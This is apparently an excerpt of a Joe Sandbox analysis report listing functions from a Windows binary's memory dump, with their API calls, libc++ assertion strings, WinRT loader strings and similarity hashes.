                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,0000011C,00000000,?,00D25477,0000011C,00DC5B88,00000000), ref: 00D25620
                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-wow64-l1-1-1.dll,?,?,?,?,?,?,?,00000000,0000011C,00000000,?,00D25477,0000011C,00DC5B88,00000000), ref: 00D2562D
                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process2), ref: 00D25646
                                                  • GetCurrentProcess.KERNEL32(?,?,?,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000001), ref: 00D25824
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcess$AddressHandleModuleProc
                                                  • String ID: DisplayVersion$IsWow64Process2$ReleaseId$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR$api-ms-win-core-wow64-l1-1-1.dll
                                                  • API String ID: 1114296175-236569533
                                                  • Opcode ID: c93eb9eefd2cd501ce18b09380cbd8c1930dbcc4602dbeb7fab9f89204fdac9e
                                                  • Instruction ID: bfff3e5d54b7d002ebd335c8e32c7e26571272ef1c43ced1bac487e516d0c155
                                                  • Opcode Fuzzy Hash: c93eb9eefd2cd501ce18b09380cbd8c1930dbcc4602dbeb7fab9f89204fdac9e
                                                  • Instruction Fuzzy Hash: A5A1DF70900B24DFDB20CF64E484BAEBBF1EF69318F184529E88697241E775E985CB71
                                                  Function 00D19F90 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_header.LIBCMT ref: 00D1A3BF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_header
                                                  • String ID: April$August$December$February$January$March$November$October$September
                                                  • API String ID: 3738618077-521072420
                                                  • Opcode ID: 35370463eb47f1966fa3cd7745f98f37ae938119739967b6926499466a9698cd
                                                  • Instruction ID: cb50decf101a5b4ab5de9ebb3d81fcd63f193f4cb7764576c87ae8116901798f
                                                  • Opcode Fuzzy Hash: 35370463eb47f1966fa3cd7745f98f37ae938119739967b6926499466a9698cd
                                                  • Instruction Fuzzy Hash: 9FA1E1B0986B03EBE7109F44F815F953A91EB10324F94411DE5896B3DDCBB978C48B76
                                                  Function 00D479C0 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 201fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D599B0: GetNamedSecurityInfoW.ADVAPI32 ref: 00D599F9
                                                    • Part of subcall function 00D599B0: SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D59A09
                                                  • CreateFileW.KERNEL32 ref: 00D47B19
                                                  • GetLastError.KERNEL32 ref: 00D47B25
                                                  • SetLastError.KERNEL32(00000000), ref: 00D47B42
                                                  Strings
                                                  • !empty(), xrefs: 00D47BE4
                                                  • back() called on an empty vector, xrefs: 00D47BDF
                                                  • __location != nullptr, xrefs: 00D47C02
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h, xrefs: 00D47C09
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 00D47BEE
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D47BF3, 00D47C0E
                                                  • null pointer given to construct_at, xrefs: 00D47BFD
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$CreateFileInfoNamedSecurity
                                                  • String ID: !empty()$%s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h$..\..\buildtools\third_party\libc++\trunk\include\vector$__location != nullptr$back() called on an empty vector$null pointer given to construct_at
                                                  • API String ID: 1248798413-751371438
                                                  • Opcode ID: fb4615fd4c5434b83d371589babda2c949e181d88094af9bd953b3fc528fe8c3
                                                  • Instruction ID: faf6137610fc7005f0998d2280ad1492e9fe865d08adccae00f4fae1f798eac9
                                                  • Opcode Fuzzy Hash: fb4615fd4c5434b83d371589babda2c949e181d88094af9bd953b3fc528fe8c3
                                                  • Instruction Fuzzy Hash: 9661B372E083489FDF119FA4CC85BEEB7B5EB45714F084129F9496B282DB709948CBB1
                                                  Function 00D59020 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • BuildTrusteeWithSidW.ADVAPI32(00000000,00000000), ref: 00D59108
                                                  • SetEntriesInAclW.ADVAPI32(?,?,?,00000000), ref: 00D59149
                                                  • SetLastError.KERNEL32(00000000), ref: 00D59154
                                                  • LocalFree.KERNEL32(00000000), ref: 00D59187
                                                  Strings
                                                  • __location != nullptr, xrefs: 00D590BE
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h, xrefs: 00D590C5
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D590CA
                                                  • null pointer given to construct_at, xrefs: 00D590B9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: BuildEntriesErrorFreeLastLocalTrusteeWith
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h$__location != nullptr$null pointer given to construct_at
                                                  • API String ID: 2527364759-3901857445
                                                  • Opcode ID: 0aa3a31b044851839f658e6e24abfb2df05692bc0ad55a1506ce4c4aa5d7837c
                                                  • Instruction ID: 83f3213ff4f8de2793cec6ce190733c88427ee5c9974e1e4f5f1a42c7420166a
                                                  • Opcode Fuzzy Hash: 0aa3a31b044851839f658e6e24abfb2df05692bc0ad55a1506ce4c4aa5d7837c
                                                  • Instruction Fuzzy Hash: 3D419BB1A00315CFDB009FA9DC98BAEB7B5EF49310F08416AED05AB351EB759848CB71
                                                  Function 00D2E880 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • !empty(), xrefs: 00D2E9ED
                                                  • back() called on an empty vector, xrefs: 00D2E9E8
                                                  • __location != nullptr, xrefs: 00D2EA0B
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h, xrefs: 00D2EA12
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\vector, xrefs: 00D2E9F7
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00D2E9FC, 00D2EA17
                                                  • null pointer given to construct_at, xrefs: 00D2EA06
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: !empty()$%s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__memory\construct_at.h$..\..\buildtools\third_party\libc++\trunk\include\vector$__location != nullptr$back() called on an empty vector$null pointer given to construct_at
                                                  • API String ID: 4218353326-751371438
                                                  • Opcode ID: 2bb93f55fb1deb9a8408cc25157da948657480ee146b865d191dec1ee5dad9d4
                                                  • Instruction ID: c1fa1daafd72fe658414e03bb7bcf4320eaafe48f754fea03db8f2797184dd03
                                                  • Opcode Fuzzy Hash: 2bb93f55fb1deb9a8408cc25157da948657480ee146b865d191dec1ee5dad9d4
                                                  • Instruction Fuzzy Hash: 9C412871A003299FCF209FA8DC41A9FB7B5FF65718F14052AF95567280E3709944CBB0
                                                  Function 00D196A0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 133COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_header.LIBCMT ref: 00D198DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_header
                                                  • String ID: Friday$Monday$Saturday$Sunday$Thursday$Tuesday$Wednesday
                                                  • API String ID: 3738618077-1471634407
                                                  • Opcode ID: 6be0a2eb7519ec8282722fff5251450e75280332e43ad98fa8c074b62a198c63
                                                  • Instruction ID: 8c95b793cdb7afbadce1d66cb1183645d88006cb842d399ce119ba34899157a1
                                                  • Opcode Fuzzy Hash: 6be0a2eb7519ec8282722fff5251450e75280332e43ad98fa8c074b62a198c63
                                                  • Instruction Fuzzy Hash: 4C51BC74948B03AEE7189B00F826F957A95EB40726F14402DE58A1B3D9CBB538C4CBB2
                                                  Function 00CED7A8 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • __s2 < __s1 || __s2 >= __s1+__n, xrefs: 00CED838
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h, xrefs: 00CED842
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\string, xrefs: 00CED82C
                                                  • __n == 0 || __s != nullptr, xrefs: 00CED822
                                                  • basic_string(const char*, n) detected nullptr, xrefs: 00CED81D
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00CED847
                                                  • char_traits::copy overlapped range, xrefs: 00CED833
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h$..\..\buildtools\third_party\libc++\trunk\include\string$__n == 0 || __s != nullptr$__s2 < __s1 || __s2 >= __s1+__n$basic_string(const char*, n) detected nullptr$char_traits::copy overlapped range
                                                  • API String ID: 4218353326-3850207310
                                                  • Opcode ID: 170d967cc10316626d92669a926c49c430d59c946e0dd94ca3941902c3aef4a7
                                                  • Instruction ID: 990e71c873c57f1b1bb6a7356b080b2519b6089413dd316c6fd32b3970cfc9e5
                                                  • Opcode Fuzzy Hash: 170d967cc10316626d92669a926c49c430d59c946e0dd94ca3941902c3aef4a7
                                                  • Instruction Fuzzy Hash: D82147723403846FE7346A979CC1E6EB28CEB52B64B18413FF5178B281E9E09D0483F5
                                                  Function 00D26000 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 90libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_header.LIBCMT ref: 00D26067
                                                  • GetProcAddress.KERNEL32(00000000,RoInitialize), ref: 00D260A4
                                                  • __Init_thread_header.LIBCMT ref: 00D260CA
                                                    • Part of subcall function 00D61817: EnterCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D61822
                                                    • Part of subcall function 00D61817: LeaveCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D6185F
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,?,00DC5BC8,?,?,?,?,?,?,?,?,?,-00000001), ref: 00D26118
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CriticalInit_thread_headerSection$AddressEnterLeaveLibraryLoadProc
                                                  • String ID: ..\..\base\win\scoped_winrt_initializer.cc$RoInitialize$combase.dll$operator()
                                                  • API String ID: 882557473-4077768022
                                                  • Opcode ID: f9b0c95d01f1cb309c6b0f09a03cc869cfc1406e35e17a64bf6a80706ca4a4fc
                                                  • Instruction ID: 6018574130a48ab7ef2ce50cc6d8ef366b72f67b7759970ecb92dfecbb83d1a2
                                                  • Opcode Fuzzy Hash: f9b0c95d01f1cb309c6b0f09a03cc869cfc1406e35e17a64bf6a80706ca4a4fc
                                                  • Instruction Fuzzy Hash: C931E131A40712AFCB20EB24FD82F6A3762FB58714B18416DF502973C1DAB1BC84CAB5
                                                  Function 00D26140 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 85libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_header.LIBCMT ref: 00D261A3
                                                  • GetProcAddress.KERNEL32(00000000,RoUninitialize), ref: 00D261E0
                                                  • __Init_thread_header.LIBCMT ref: 00D26206
                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,?,00DC5BC8), ref: 00D26254
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_header$AddressLibraryLoadProc
                                                  • String ID: ..\..\base\win\scoped_winrt_initializer.cc$RoUninitialize$combase.dll$operator()
                                                  • API String ID: 900114960-1867938867
                                                  • Opcode ID: 41da4f0fc1e9cf9f090db88bee3bfda0edec5a78c0ffe321e0a1d39dda09cffb
                                                  • Instruction ID: df9b055ca0e800b89cf3f444f3387cd83bfe5e868638afd354800b8325b9e236
                                                  • Opcode Fuzzy Hash: 41da4f0fc1e9cf9f090db88bee3bfda0edec5a78c0ffe321e0a1d39dda09cffb
                                                  • Instruction Fuzzy Hash: A331ED35A00706EBCB10AB28FC56F697BA2FB64714F148129E412973C6DB31FD85CAB5
                                                  Function 00CED858 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: _strlen
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\__string\char_traits.h$..\..\buildtools\third_party\libc++\trunk\include\string$__s != nullptr$__s2 < __s1 || __s2 >= __s1+__n$basic_string(const char*) detected nullptr$char_traits::copy overlapped range
                                                  • API String ID: 4218353326-4006657160
                                                  • Opcode ID: 6f51d33089757d0bcf620b25e6dd0ba64fc899d327336b870f9026324d5035c6
                                                  • Instruction ID: 2722b41ac757906c7b9ee8e88d92adfbbeec8209816a052251a662744da9672a
                                                  • Opcode Fuzzy Hash: 6f51d33089757d0bcf620b25e6dd0ba64fc899d327336b870f9026324d5035c6
                                                  • Instruction Fuzzy Hash: C51148713403846FE3342AA69CC2A5BB189DB42B60B28453EF1179B381E8E0DC0443F1
                                                  Function 00CEDE6C Relevance: 14.0, APIs: 2, Strings: 6, Instructions: 25libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,?,%s:%d: assertion %s failed: %s,..\..\buildtools\third_party\libc++\trunk\include\string,0000091F,__n == 0 || __s != nullptr,string::assign received nullptr), ref: 00CEDEA8
                                                  • GetProcAddress.KERNEL32(00000000,RtlCaptureStackBackTrace), ref: 00CEDEB4
                                                  Strings
                                                  • RtlCaptureStackBackTrace, xrefs: 00CEDEAE
                                                  • ..\..\buildtools\third_party\libc++\trunk\include\string, xrefs: 00CEDE90
                                                  • __n == 0 || __s != nullptr, xrefs: 00CEDE86
                                                  • string::assign received nullptr, xrefs: 00CEDE81
                                                  • ntdll.dll, xrefs: 00CEDEA3
                                                  • %s:%d: assertion %s failed: %s, xrefs: 00CEDE95
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: %s:%d: assertion %s failed: %s$..\..\buildtools\third_party\libc++\trunk\include\string$RtlCaptureStackBackTrace$__n == 0 || __s != nullptr$ntdll.dll$string::assign received nullptr
                                                  • API String ID: 1646373207-2444486229
                                                  • Opcode ID: 945eb02c54c94688f2662a96362320e667e14e42e14d87e933765937f139e300
                                                  • Instruction ID: 8e249edcdfe031f6c34fa2254a312297f3926d12632b3dacd357f47350ba6c32
                                                  • Opcode Fuzzy Hash: 945eb02c54c94688f2662a96362320e667e14e42e14d87e933765937f139e300
                                                  • Instruction Fuzzy Hash: 77E09A3168030CBFC6002BC3EC4AF563A599716B31F0084B2FA2A956A187F4519886B1
                                                  Function 00D79A58 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
